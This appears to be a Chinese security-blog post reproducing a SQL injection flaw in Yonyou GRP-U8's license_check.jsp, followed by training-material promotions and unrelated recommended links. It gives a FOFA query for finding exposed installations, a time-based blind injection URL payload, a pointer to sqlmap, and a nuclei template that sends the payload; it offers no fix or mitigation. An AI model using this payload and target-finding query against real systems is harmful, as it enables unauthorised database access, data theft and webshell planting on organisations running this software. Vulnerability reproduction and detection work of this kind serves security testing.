用友 GRP-U8 存在sql注入漏洞复现

0x01 漏洞介绍

用友 GRP-U8 license_check.jsp 存在sql注入,攻击者可利用该漏洞执行任意SQL语句,如查询数据、下载数据、写入webshell、执行系统命令以及绕过登录限制等。
fofa:app="用友-GRP-U8"

0x02 POC:

/u8qx/license_check.jsp?kjnd=1';WAITFOR%20DELAY%20'0:0:3'---

0x03 sqlmap 一把梭哈

0x04 nuclei poc

命令:nuclei -t /nuclei-poc/yonyou/用友-GRP-U8+sql.yaml -u Track 安全社区 --- 掌控安全在线教育- Track 知识社区 - 掌控安全在线教育 - Powered by 掌控者

python 复制代码
id: u8grp_license_check
info:
name: 用友GRP-U8 License Check漏洞
author: YourName
severity: high

requests:
- method: GET
path:
- "{{BaseURL}}/u8qx/license_check.jsp?kjnd=1';WAITFOR%20DELAY%20'0:0:3'--"
headers:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36

req-condition: true
matchers:
- type: dsl
dsl:
- 'contains(body_1, "1")'
condition: and

还没看够?可以关注~

免费领取安全学习资料包!(私聊进群一起学习,共同进步)

渗透工具

技术文档、书籍

面试题

帮助你在面试中脱颖而出

视频

基础到进阶

环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等

应急响应笔记

学习路线

相关推荐
谁他个天昏地暗6 分钟前
标准SQL语句示例
数据库·sql·oracle
LilySesy11 分钟前
【案例总结】幽灵单据——消失的交货单号
数据库·ai·oracle·编辑器·sap·abap
看天走路吃雪糕11 分钟前
墨者:SQL注入实战-MySQL
数据库·mysql·base64·sql注入·sqlmap·墨者靶场·tamper
程序猿小D16 分钟前
Java项目:基于SSM框架实现的进销存管理系统【ssm+B/S架构+源码+数据库+毕业论文+远程部署】
java·数据库·mysql·ssm·jsp·毕业论文·进销存管理系统
HoHeHa24 分钟前
IDEA 手动下载安装数据库驱动,IDEA无法下载数据库驱动问题解决方案,IDEA无法连接数据库解决方案(通用,Oracle为例)
java·数据库·intellij-idea
22:30Plane-Moon27 分钟前
SQL 查询语法笔记
数据库·笔记·sql
望获linux1 小时前
【Linux基础知识系列】第六十四篇 - 了解Linux的硬件架构
linux·运维·服务器·开发语言·数据库·操作系统·嵌入式软件
全栈小51 小时前
【数据库】使用Sql Server将分组后指定字段的行数据转为一个字段显示,并且以逗号隔开每个值,收藏不迷路
数据库·sql server
JohnYan2 小时前
工作笔记 - 一种业务信息汇报机制的设计和实现
数据库·后端·postgresql
sq8002 小时前
EFCore ORM 数据库数据表迁移
数据库·后端·orm